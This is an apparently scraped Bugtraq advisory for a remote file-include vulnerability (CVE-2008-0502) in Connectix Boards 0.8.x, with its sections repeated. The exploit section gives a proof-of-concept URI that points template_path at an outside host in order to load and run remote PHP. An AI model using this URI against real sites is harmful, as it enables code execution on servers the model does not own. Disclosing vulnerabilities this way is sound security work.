Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability
BID:27506
Info
Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability
| Bugtraq ID: | 27506 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0502 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | H-T Team discovered this issue. |
| Vulnerable: |
Connectix Connectix Board 0.8.2 Connectix Connectix Board 0.8.1 |
| Not Vulnerable: | |
Discussion
Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability
Connectix Boards is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
This issue affects Connectix Boards 0.8.1 and 0.8.2; other versions may also be vulnerable.
Connectix Boards is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
This issue affects Connectix Boards 0.8.1 and 0.8.2; other versions may also be vulnerable.
Exploit / POC
Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/templates/Official/part_userprofile.php?template_path=http://www.example2.com
The following proof-of-concept script code is also available:
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/templates/Official/part_userprofile.php?template_path=http://www.example2.com
The following proof-of-concept script code is also available:
Solution / Fix
Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability
References:
References:
- Connectix Boards Homepage (Connectix)